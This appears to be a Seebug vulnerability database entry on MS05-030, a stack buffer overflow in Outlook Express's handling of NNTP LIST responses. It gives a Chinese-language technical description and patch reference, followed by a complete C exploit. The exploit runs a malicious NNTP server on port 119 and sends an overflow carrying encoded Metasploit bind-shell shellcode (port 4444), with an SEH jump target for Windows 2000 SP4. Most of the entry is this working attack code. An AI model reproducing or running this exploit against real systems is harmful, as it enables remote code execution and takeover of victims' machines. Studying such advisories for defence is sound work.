MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)

2005-06-2400:00:00

Root

www.seebug.org

0.974 High

EPSS

Percentile

99.9%

JSON

漏洞描述：Microsoft Outlook Express是Microsoft Windows操作系统捆绑的邮件和新闻组客户端。Microsoft Outlook Express的新闻阅读功能中存在远程缓冲区溢出漏洞，可能允许攻击者以当前用户的权限执行任意代码。具体的说，在发布LIST命令后解析NNTP服务器响应时会触发这个漏洞。位于C:\Program Files\Outlook Express\MSOE.DLL的MSOE.dll中的一个例程中存在栈溢出。以下地址和偏移基于Microsoft Windows 2000 SP4捆绑的MSOE.DLL 5.50.4927.1200版本。在解析以下形式的服务器响应时：alt.12hr 0<LONG STRING>000001325 0000001322 y FIELD1 FIELD2 FIELD3 FIELD4 TERMINATOR用到了各种字符串解析循环调用CharNext()和IsSpace()例程来判断空白字符所确定字段的长度，由StrCpy()将FIELD2拷贝到静态的16字节栈缓冲区：SUB_6AED247A() … 6AED268B mov eax, ebx ; eax = start of FIELD2 6AED268D lea edi, [ebp+buff] ; edi = stack variable 6AED2690 sub eax, esi ; esi = end of FIELD2 6AED2692 mov ecx, eax ; ecx = length of FIELD2 6AED2694 mov edx, ecx ; edx = length of FIELD2 6AED2696 shr ecx, 2 6AED2699 rep movsd ; *** overflow occurs here 6AED269B mov ecx, edx 6AED269D and ecx, 3 6AED26A0 rep movsb ; copy remaining bytes 6AED26A2 and byte ptr [ebp+eax+buff], 0 ; null terminate the string然后将拷贝的缓冲区传送给例程StrToIntA()。位于0x6AED2699的rep movsd指令可以导致栈溢出。攻击者可以覆盖栈存储的SEH来改变执行流，最终导致执行任意代码。漏洞影响：受影响的软件： •Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4•Microsoft Windows XP Service Pack 1•Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)：•Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)•Microsoft Windows Server 2003（用于基于 Itanium 的系统）•Microsoft Windows Server 2003•Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME) 受影响的组件： •在 Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4 上的 Outlook Express 5.5 Service Pack 2•在 Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 或 Microsoft Windows XP Service Pack 1 上的 Outlook Express 6 Service Pack 1•用于 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) 的 Outlook Express 6 Service Pack 1•用于 Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) 的 Outlook Express 6 •用于 Microsoft Windows Server 2003（用于基于 Itanium 的系统）的 Outlook Express 6 •用于 Microsoft Windows Server 2003 的 Outlook Express 6 不受影响的软件： •Microsoft Windows Server 2003 Service Pack 1•Microsoft Windows Server 2003 with SP1（用于基于 Itanium 的系统）•Microsoft Windows Server 2003 x64 Edition•Microsoft Windows XP Professional x64 Edition•Microsoft Windows XP Service Pack 2 CVE-ID：CVE-2005-1213 CNNVD-ID：CNNVD-200506-126 CNVD-ID：CNVD-2005-2133 解决方案：Microsoft --------- Microsoft已经为此发布了一个安全公告（MS05-030）以及相应补丁:MS05-030：Cumulative Security Update in Outlook Express (897715)链接：<a href=“http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx”>http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx</a>


                                                #include &lt;winsock2.h&gt;
#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#pragma comment(lib,&quot;ws2_32&quot;)

/* win32_bind - EXITFUNC=process LPORT=4444 Size=344 
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
&quot;\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96&quot;
&quot;\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1&quot;
&quot;\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5&quot;
&quot;\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7&quot;
&quot;\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16&quot;
&quot;\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5&quot;
&quot;\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5&quot;
&quot;\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e&quot;
&quot;\x69\xf1\xae\x6d\xf0\x4f\xfb\x0c\xfe\x50\xbb\x0c\xc9\x73\x37\xee&quot;
&quot;\xfe\xec\x25\xc2\xad\x77\x37\xe8\xc9\xae\x2d\x58\x17\xca\xc0\x3c&quot;
&quot;\xc3\x4d\xca\xc1\x46\x4f\x11\x37\x63\x8a\x9f\xc1\x40\x74\x9b\x6d&quot;
&quot;\xc5\x74\x8b\x6d\xd5\x74\x37\xee\xf0\x4f\xd9\x62\xf0\x74\x41\xdf&quot;
&quot;\x03\x4f\x6c\x24\xe6\xe0\x9f\xc1\x40\x4d\xd8\x6f\xc3\xd8\x18\x56&quot;
&quot;\x32\x8a\xe6\xd7\xc1\xd8\x1e\x6d\xc3\xd8\x18\x56\x73\x6e\x4e\x77&quot;
&quot;\xc1\xd8\x1e\x6e\xc2\x73\x9d\xc1\x46\xb4\xa0\xd9\xef\xe1\xb1\x69&quot;
&quot;\x69\xf1\x9d\xc1\x46\x41\xa2\x5a\xf0\x4f\xab\x53\x1f\xc2\xa2\x6e&quot;
&quot;\xcf\x0e\x04\xb7\x71\x4d\x8c\xb7\x74\x16\x08\xcd\x3c\xd9\x8a\x13&quot;
&quot;\x68\x65\xe4\xad\x1b\x5d\xf0\x95\x3d\x8c\xa0\x4c\x68\x94\xde\xc1&quot;
&quot;\xe3\x63\x37\xe8\xcd\x70\x9a\x6f\xc7\x76\xa2\x3f\xc7\x76\x9d\x6f&quot;
&quot;\x69\xf7\xa0\x93\x4f\x22\x06\x6d\x69\xf1\xa2\xc1\x69\x10\x37\xee&quot;
&quot;\x1d\x70\x34\xbd\x52\x43\x37\xe8\xc4\xd8\x18\x56\xe8\xff\x2a\x4d&quot;
&quot;\xc5\xd8\x1e\xc1\x46\x27\xc8\x3e&quot;;

struct
{
DWORD dwJMPEBX;
char *szDescription;
}targets[] = 
{
{0x7803382b, &quot;win2k sp4 all language&quot;}
},v;

void usage(char *p)
{
int i;
printf( &quot;Usage: %s &lt;type&gt;\n&quot;
&quot;[type]\n&quot;, p);
for(i=0;i&lt;sizeof(targets)/sizeof(v);i++)
{
printf(&quot;%d\t%s\n&quot;, i, targets[i].szDescription);
}
}

void main(int argc, char **argv)
{
struct sockaddr_in server,client;
WSADATA wsd;
SOCKET s2,s3;
int ret;
char szRecvBuff[0x100];
char szSend[] = &quot;200\r\n&quot;;
int i,iType;
char szEvil[0x3000], szTmp[0x10];

printf( &quot;MS OE NNTP \&quot;LIST\&quot; Buffer Overflow (MS05-030) EXP\n&quot;
&quot;Credits: Bug found by iDEFENSE\n&quot;
&quot;coded by eyas &lt; eyas at xfocus.org&gt;\n&quot;
&quot;http://www.xfocus.net\n\n&quot;);

if(argc!=2)
{
usage(argv[0]);
return;
}

iType = atoi(argv[1]);


if (WSAStartup(MAKEWORD(1,1), &amp;wsd) != 0)
{
printf(&quot;[-] WSAStartup error:%d\n&quot;, WSAGetLastError());
return;
}
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(119);
server.sin_addr.s_addr= 0;
ret = bind(s2, (struct sockaddr *)&amp;server, sizeof(server));
ret = listen(s2, 100);
printf(&quot;[+] Listen on TCP 119.\n&quot;);
while(1)
{
ret=sizeof(client);
s3 = accept(s2, (struct sockaddr *)&amp;client, &amp;ret);
printf(&quot;[+] Connection accepted from %s:%d\n&quot;, 
inet_ntoa(client.sin_addr), ntohs(client.sin_port));

printf(&quot;[+] Send welcome information.\n&quot;);
send(s3, szSend, strlen(szSend), 0);

ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-1] = '\x0';
printf(&quot;[+] Recv: [%s]\n&quot;, szRecvBuff);
send(s3, szSend, strlen(szSend), 0);
printf(&quot;[+] Send response.\n&quot;);

ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-4] = '\x0';
printf(&quot;[+] Recv: [%s]\n&quot;, szRecvBuff);
printf(&quot;[+] send evil buff.\n&quot;);

strcpy(szTmp, &quot;\xEB\x06\xEB\x06&quot;);
memcpy(&amp;szTmp[4], &amp;(targets[iType].dwJMPEBX),4);
szTmp[8]='\x0';
strcpy(szEvil, &quot;215 list\r\ngroup aaaa&quot;);
//for(i=0;i&lt;0x2598;i++)
//for(i=0;i&lt;0x30;i++)
for(i=0;i&lt;0x2598+0x200;i+=8)
strcat(szEvil, szTmp);
strcat(szEvil, (char *)scode);
strcat(szEvil, &quot; 1 y\r\n.\r\n&quot;);
send(s3, szEvil, strlen(szEvil), 0);
Sleep(1000);
closesocket(s3);
printf(&quot;[+] close connection\n&quot;);
}

WSACleanup();
return;
}

// sebug.net

0.974 High

EPSS

Percentile

99.9%

JSON

Related for SSV:13664